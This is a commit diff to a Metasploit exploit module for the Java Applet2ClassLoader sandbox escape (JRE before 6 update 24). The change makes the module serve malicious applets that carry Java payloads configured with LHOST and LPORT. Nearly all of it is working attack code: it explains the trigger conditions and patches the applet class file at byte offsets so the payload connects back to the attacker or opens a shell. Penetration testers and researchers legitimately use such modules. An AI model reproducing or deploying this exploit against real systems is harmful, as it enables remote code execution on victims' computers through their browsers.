enable java payloads, currently via one-off method

git-svn-id: file:///home/svn/framework3/trunk@12012 4d416f70-5f16-0410-b530-b9f4589650da
2011-03-17 23:57:11 +00:00
parent e094c7e941
commit fb6107ffb5
4 changed files with 243 additions and 36 deletions
@@ -21,12 +21,16 @@ class Metasploit3 < Msf::Exploit::Remote
 		super( update_info( info,
 			'Name'          => 'Sun Java Applet2ClassLoader Remote Code Execution Exploit',
 			'Description'   => %q{
-					This module exploits a vulnerability in Java Runtime Environment
-				that allows an attacker to escape the Java Sandbox. By supplying a 
-				codebase that points at a trusted directory and a code that is a URL that
-				does not contain an dots an applet can run without the sandbox.
+					This module exploits a vulnerability in the Java Runtime Environment
+				that allows an attacker to run an applet outside of the Java Sandbox. When
+				an applet is invoked with:

-				The vulnerability affects version 6 prior to update 24.
+				1. A "codebase" parameter that points at a trusted directory
+				2. A "code" parameter that is a URL that does not contain any dots
+
+				the applet will run outside of the sandbox.
+
+				This vulnerability affects JRE prior to version 6 update 24.
 			},
 			'License'       => MSF_LICENSE,
 			'Author'        => [
@@ -42,13 +46,30 @@ class Metasploit3 < Msf::Exploit::Remote
 					[ 'URL', 'http://fhoguin.com/2011/03/oracle-java-unsigned-applet-applet2classloader-remote-code-execution-vulnerability-zdi-11-084-explained/' ],
 					[ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpufeb2011-304611.html' ]
 				],
-			'Platform'      => [ 'java', 'win' ],
-			'Payload'       => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
+			'Platform'      => [ 'java' ], #, 'win' ],
+			'Payload'       =>
+				{
+					'Space' => 20480,
+					'BadChars' => '',
+					'DisableNops' => true,
+					'Compat' =>
+						{
+							# bind doesn't make much sense for client sides
+							'ConnectionType' => '-find -bind'
+						}
+				},
 			'Targets'       =>
 				[
 					# OK on Windows x86 + IE + Sun Java 1.6.0u21,u22,u23
 					# FAIL on Ubuntu x86 + Firefox + Sun Java 1.6.0u23
-					[ 'Automatic (no payload)', { } ]
+					[ 'Generic (Java Payload)',
+						{
+							'Arch' => ARCH_JAVA,
+							'Platform' => 'java',
+						}
+					],
+					
+					# Native payloads aren't currently supported (only work with jar/war)
 =begin
 					[ 'Windows x86',
 						{
@@ -56,12 +77,6 @@ class Metasploit3 < Msf::Exploit::Remote
 							'Platform' => 'win',
 						}
 					],
-					[ 'Generic (Java Payload)',
-						{
-							'Arch' => ARCH_JAVA,
-							'Platform' => 'java',
-						}
-					],
 =end
 				],
 			'DefaultTarget'  => 0,
@@ -70,7 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	
 		register_options(
 			[
-				OptString.new('CMD', [ false,  "Command to run.", "calc.exe"]),
+				# This is the default for a 32-bit Windows install
 				OptString.new('LIBPATH', [ false,  "The codebase path to use (privileged)",
 					"C:\\Program Files\\java\\jre6\\lib\\ext"]),
 			], self.class)
@@ -98,27 +113,37 @@ class Metasploit3 < Msf::Exploit::Remote
 		# Do what get_uri does so that we can replace it in the string
 		host = Rex::Socket.source_address(cli.peerhost)
 		host_num = Rex::Socket.addr_aton(host).unpack('N').first
-
-		codebase = "file:" + datastore['LIBPATH']
 		code_url = jpath.sub(host, host_num.to_s)

-		cmd = datastore['CMD']
-		cmd_off = 0xb4
+		codebase = "file:" + "C:\\Program Files (x86)\\java\\jre6\\lib\\ext"
+		codebase = "file:" + "C:\\Program Files\\java\\jre6\\lib\\ext"

-		cn_off = 0xfc
+		config = "Spawn=2\nLPORT=#{datastore['LPORT']}\n"
+		# The java payloads decide to be reverse if LHOST is set.
+		config << "LHOST=#{datastore['LHOST']}\n" if datastore['PAYLOAD'] =~ /reverse/
+		config_off = 0x10e
+
+		cn_off = 0x2f76

 		case request.uri

 		when /\.class$/
+			# NOTE: the payload for this module is implemented in the .class file directly.
+			#
+			# This is due to the following:
+			# 1. The file must be a single .class file
+			# 2. The class inside must derive from Applet
+			#
+			# As such, we do not use the traditional payload generation facilities.
 			#p = regenerate_payload(cli)

 			print_status("Sending class file to #{cli.peerhost}:#{cli.peerport}...")

 			cls = @java_class.dup
-			cls[cmd_off,2] = [cmd.length].pack('n')
-			cls[cmd_off+2,8] = cmd
+			cls[config_off,2] = [config.length].pack('n')
+			cls[config_off+2,8] = config

-			cn_off += (cmd.length - 8)  # the original length was 8 (calc.exe)
+			cn_off += (config.length - 8)  # the original length was 8 (CONFIGZZ)
 			cls[cn_off,2] = [code_url.length].pack('n')
 			cls[cn_off+2,7] = code_url

@@ -137,7 +162,6 @@ class Metasploit3 < Msf::Exploit::Remote
 EOS
 			print_status("Sending HTML file to #{cli.peerhost}:#{cli.peerport}...")
 			send_response_html(cli, html)
-			handler(cli)
 		end

 	end